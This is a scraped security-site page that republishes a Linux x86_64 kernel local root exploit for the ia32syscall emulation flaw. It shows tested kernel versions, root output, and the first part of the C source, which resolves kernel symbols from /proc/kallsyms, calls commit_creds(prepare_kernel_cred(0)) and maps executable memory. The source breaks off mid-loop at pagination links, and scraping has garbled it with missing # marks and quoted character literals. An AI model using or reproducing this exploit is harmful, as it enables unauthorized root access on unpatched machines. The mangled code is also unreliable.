Linux 2.6.3* x86_64 2 0 1 0 local root exploit-vulnerability warning-the black bar safety net

2011-10-29T00:00:00
ID MYHACK58:62201132181
Type myhack58
Reporter 佚名
Modified 2011-10-29T00:00:00

Description

Test environment: Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-2 4-generic | 2.6.37 (2 0 1 0)

  • Result;

  • id

  • uid=0(root) gid=0(root)

*

  • 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )

*

  • If y0u g37 3Rr0R > ./ 1 3 3 7

  • symbol table not available, aborting!

  • Process finished < O_o

  • C4usE 3xpl017 Re4dS "/proc/kallsyms" | "/proc/ksyms" , iF n07 4va1bl3! iT g1ve5 ErRoR O_o

*

  • Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !

  • Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !

*/

include <sys/types. h>

include <sys/wait. h>

include <sys/ptrace. h>

include <inttypes. h>

include <sys/reg. h>

include <unistd. h>

include <stdio. h>

include <stdlib. h>

include <sys/mman. h>

include <string. h>

typedef int attribute((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long attribute((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void file, void vma)

{

commit_creds(prepare_kernel_cred(0));

return -1;

}

unsigned long

get_symbol(char *name)

{

FILE *f;

unsigned long addr;

char dummy;

char sname[5 1 2];

int ret = 0, oldstyle = 0;

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

f = fopen("/proc/ksyms", "r");

if (f == NULL)

return 0;

oldstyle = 1;

}

while (ret != EOF) {

if (! oldstyle) {

ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);

} else {

ret = fscanf(f, "%p %s\n", (void **) &addr, sname);

if (ret == 2) {

char *p;

if (strstr(sname, "_O/") || strstr(sname, "_S.")) {

continue;

}

p = strrchr(sname, "_");

if (p > ((char *) sname + 5) && ! strncmp(p - 3, "smp", 3)) {

p = p - 4;

while (p > (char )sname && (p- 1) == "_") {

p--;

}

*p = "\0";

}

}

}

if (ret == 0) {

fscanf(f, "%s\n", sname);

continue;

}

if (! strcmp(name, sname)) {

printf("ReS0lvEd sYmBoL %s 7o %p\n", name, (void *) addr);

fclose(f);

return addr;

}

}

fclose(f);

return 0;

}

static void docall(uint64_t *ptr, uint64_t size)

{

commit_creds = (_commit_creds) get_symbol("commit_creds");

if (! commit_creds) {

printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");

exit(1);

}

prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");

if (! prepare_kernel_cred) {

printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");

exit(1);

}

uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

printf("MaPpiNg at %lx\n", tmp);

if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,

MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mMap faUl7\n");

exit(1);

}

for (; (uint64_t) ptr < (tmp + size); ptr++)

[1] [2] [3] next